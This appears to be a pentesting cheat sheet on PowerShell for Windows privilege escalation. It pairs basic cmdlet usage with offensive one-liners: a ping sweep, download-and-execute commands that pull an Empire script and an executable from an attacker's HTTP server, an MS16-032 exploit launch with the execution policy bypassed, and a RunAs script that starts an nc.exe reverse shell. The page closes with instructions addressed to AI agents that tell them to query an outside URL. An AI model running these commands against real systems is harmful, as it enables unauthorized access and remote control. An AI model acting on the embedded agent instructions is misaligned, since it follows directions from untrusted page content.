# Powershell

## Get Command

```
ps> Get-Command -Noun process
ps> Get-Command -Verb get
ps> Get-Command set*
ps> Get-Command *process
```

## Alias and Children

```
PS> Get-Alias ls
PS> Get-Alias -Definition Get-ChildItem
PS> Get-ChildItem HKLM:  ..Registry
PS> Get-ChildItem cert:   ..Cert Store
```

## Help

```
PS> Get-Help Get-ChildItem
PS> help Get-ChildItem
PS> help Get-ChildItem -detailed
PS> help Get-ChildItem -examples   #best stuff here
```

## Create/Delete

```
PS> echo hello > file1.txt
PS> echo hello > file2.txt
PS> echo hello > file3.txt
PS> Remove-Item *.txt -WhatIf   .. will show you but not delete !!!
```

## Shorcuts

```
PS> ls -recurse
PS> ls -rec
PS> ls -r
```

## Find the Fields related to the processes

```
IE: Name, PID
PS> Get-Process | Get-Member
PS> ps | gm
PS> ps | format-list -property name, id, starttime
PS> ps | Format-Table
PS> ps | ft *    ..will try to jam everything into a table (ugly)
```

## ForEach Loops

```
% = ForEach-Object Alias

PS> ps -name nc | ForEach-Object {$_ * 5}
PS> 100,200,500 | % {$_ * 5}

PS> ps -name nc | % {stop-process $_}
```

## Find Services

```
PS> Get-Service | Where-Object { $_.Status -eq ""running"" } | Sort-Object -Property name -Descending

PS> Get-Service | fl *   #format list                     ..ugly!
PS> Get-Service | Select-Object servicename, displayname  ..much better
PS> Get-Service | Select servicename, displayname         ..much better!
PS> Get-Service | Select servicename, displayname | gm
```

## Ping Sweeps

```
PS> 1..255 | % {echo ""10.10.10.$_""; ping -n 1 -w 100 10.10.10.$_ | select-string ttl}
```

## Downloads

```
PS> cd .\Desktop\
PS> wget http://$IP:8000/launcher.bat -OutFile launcher.bat
PS> dir
PS> notepad ./launcher.bat
```

## Download and Execute

* REF: [TransferFiles](/06-linux-privesc/04-transfer-files.md)

```
python -m SimpleHTTPServer 8080

powershell "IES(New-Object Net.WebClient).downloadString('http://10.x.x.x:8080/empire.ps1')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
```

## One Liner to run from CMD

```
MS16-032 
https://www.exploit-db.com/exploits/39719/

> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
```

## Powershell RunAs

* PowerShell can also be used to launch a process as another user.
* Simple script will run a reverse shell as the specified username and password.

```
$username = '<username here>'
$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","$IP","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public

> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/07-win-privesc/powershell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.